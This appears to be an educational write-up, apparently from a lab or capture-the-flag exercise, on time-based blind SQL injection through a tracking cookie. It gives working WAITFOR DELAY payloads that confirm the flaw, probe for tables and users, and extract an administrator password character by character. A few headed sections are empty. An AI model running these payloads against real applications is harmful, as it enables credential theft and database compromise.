🧪 Exploiting Blind SQL Injection by Triggering Time Delays

🎯 Objective

Demonstrate how to exploit a blind SQL injection vulnerability when:

• The application does not return any visible output.
• Error messages are suppressed or handled gracefully.
• No conditional response difference is observed.

In such cases, we can use time-based blind SQL injection — where the attacker forces the database to wait (delay) for a certain amount of time depending on whether an injected condition is TRUE or FALSE.

This delay allows us to infer sensitive data one character at a time based on how long it takes for the HTTP response to arrive.

🔍 Key Concepts

1️⃣ Blind SQL Injection

A type of SQL injection where the attacker cannot see the results of their query. There's no direct output or error message returned from the application.

There are two main types:

• Content-based blind SQLi: Application behavior changes slightly based on result ("Welcome back" vs nothing).
• Time-based blind SQLi: Application always behaves the same — only response time reveals the result.

2️⃣ Time-Based Detection

When the application suppresses all output and errors, we force the database to pause using built-in functions like:

If the HTTP response is delayed, it indicates that the injected condition was TRUE.

🛠️ Step-by-Step Attack Walkthrough

Let’s assume we're targeting a vulnerable web application that uses a TrackingId cookie to perform a SQL query in the backend.

We suspect SQL injection is possible but:

• No output is returned
• No visible error messages
• We observe no change in content or behavior

➡️ So we switch to time-based blind SQL injection.

✅ Step 1: Confirm Vulnerability Using Time Delay

Test if we can trigger a delay with a known TRUE and FALSE condition.

📥 Payload (TRUE condition):

'; IF (1=1) WAITFOR DELAY '0:0:10'--

📥 Payload (FALSE condition):

'; IF (1=2) WAITFOR DELAY '0:0:10'--

💡 Result:

• First request delays ~10 seconds → Condition is TRUE
• Second request returns immediately → Condition is FALSE

✅ Confirmed: We can control execution timing via SQL conditions.

✅ Step 2: Test for Table Existence

Now test if the users table exists:

📥 Payload:

'; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'--

💡 Result:

• If there is a 10-second delay, the users table exists ✅

✅ Step 3: Check for Administrator User

Next, check if the username 'administrator' exists in the users table.

📥 Payload:

'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator') > 0 WAITFOR DELAY '0:0:10'--

💡 Result:

• Delay occurs → administrator user exists ✅

✅ Step 4: Extract Password Character by Character

Now extract the password one character at a time using SUBSTRING() and ASCII() comparisons.

📥 Payload (Check if first letter > 'm'):

'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator' AND ASCII(SUBSTRING(password, 1, 1)) > 109) = 1 WAITFOR DELAY '0:0:10'--

🔁 Repeat this process for each character position and binary search through ASCII values (a-z, A-Z, 0-9) to determine the exact character.

You can automate this using:

• Burp Intruder
• Python script with requests + timing analysis

📊 Example: Binary Search Through Characters

Suppose we want to find the first character of the password:

• Try 'a' to 'z' using timing differences.
• Use binary search logic to narrow down faster.

Example payloads:

'; IF (ASCII(SUBSTRING(password,1,1)) > 97) WAITFOR DELAY '0:0:10'--  # Is it after 'a'?
'; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- # Is it after 'd'?

Eventually, you’ll pinpoint the correct character.

🧾 Summary of Key Queries

🧠 Takeaways

• When no output or error is available, time-based SQL injection is your best bet.
• Use built-in delay functions specific to the database engine.
• Use binary search to speed up password extraction.
• Automate testing with Burp Intruder or custom scripts.
• Even without seeing output, you can infer secrets via timing side channels.

🏁 Final Notes

Time-based SQL injection is a powerful technique for exploiting silent vulnerabilities. While slower than other methods, it works even when:

• Output is completely suppressed.
• Errors are handled gracefully.
• The application shows no visible change.

With patience and automation, attackers can extract full databases — including usernames, passwords, and API keys — just by measuring how long it takes for a server to respond.

🙌 Final Words

Great job understanding and applying time-based blind SQL injection! You’ve now mastered one of the most stealthy and effective techniques in ethical hacking.

Happy hacking! 💻⚡🕵️‍♂️

🧷 Tags: #SQLInjection #BlindSQLi #TimeBasedSQLi #WebSecurity #CTFWriteup #BugBounty #EthicalHacking